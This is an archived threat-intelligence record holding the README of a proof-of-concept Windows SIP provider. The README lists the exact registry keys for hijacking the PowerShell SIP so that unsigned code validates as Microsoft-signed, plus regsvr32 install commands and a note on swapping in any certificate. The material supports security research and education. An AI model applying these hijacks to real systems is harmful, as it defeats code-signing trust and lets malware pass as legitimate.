{
	"id": "a6a86cbb-7710-47a1-aeb8-6519f258916b",
	"created_at": "2026-04-06T00:19:09.232633Z",
	"updated_at": "2026-04-10T03:21:28.097332Z",
	"deleted_at": null,
	"sha1_hash": "89baabd6abcf30f1d8aa020d11fc8d90cf6318f3",
	"title": "GitHub - mattifestation/PoCSubjectInterfacePackage: A proof-of-concept subject interface package (SIP) used to demonstrate digital signature subversion attacks.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 45465,
	"plain_text": "GitHub - mattifestation/PoCSubjectInterfacePackage: A proof-of-concept subject interface package (SIP) used to demonstrate digital signature subversion attacks.\r\nBy Matt Graeber\r\nArchived: 2026-04-05 20:24:34 UTC\r\nA PoC subject interface package (SIP) provider designed to educate about the required components of a SIP provider.\r\nThis PoC is designed to serve as a basic SIP in addition to a payload for hijacking existing SIPs using the AutoApproveHash and GetLegitMSSignature functions. For example, if you wanted all PowerShell code to return a valid MS cert regardless of whether it was signed by MS, you would redirect the following:\r\nDirect PowerShell SIP hijack (Native):\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) - C:\\path\\to\\MySip.dll\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) - AutoApproveHash\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) - C:\\path\\to\\MySip.dll\r\nHKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) - GetLegitMSSignature\r\nPowerShell SIP hijack (WoW64):\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) - C:\\path\\to\\MySip_x86.dll\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) - AutoApproveHash\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\Dll (REG_SZ) - C:\\path\\to\\MySip_x86.dll\r\nHKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{603BCC1F-4B59-4E08-B724-D2C6297EF351}\\FuncName (REG_SZ) - GetLegitMSSignature\r\nA normal installation of this SIP is performed as follows (from an elevated prompt):\r\nregsvr32 C:\\path\\to\\MySip.dll\r\nUpon installing this SIP via regsvr32, any file you create with the .foo, .bar, or .baz file extension will validate properly with the embedded certificate.\r\nA normal uninstallation of this SIP is performed as follows (from an elevated prompt):\r\nregsvr32 /u C:\\path\\to\\MySip.dll\r\nNote: The included resource (MS_cert.bin) can be replaced with any Authenticode certificate (which includes any signed .cat file), thus allowing you to be whoever you want.\r\nSource: https://github.com/mattifestation/PoCSubjectInterfacePackage",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/mattifestation/PoCSubjectInterfacePackage"
	],
	"report_names": [
		"PoCSubjectInterfacePackage"
	],
	"threat_actors": [],
	"ts_created_at": 1775434749,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89baabd6abcf30f1d8aa020d11fc8d90cf6318f3.pdf",
		"text": "https://archive.orkl.eu/89baabd6abcf30f1d8aa020d11fc8d90cf6318f3.txt",
		"img": "https://archive.orkl.eu/89baabd6abcf30f1d8aa020d11fc8d90cf6318f3.jpg"
	}
}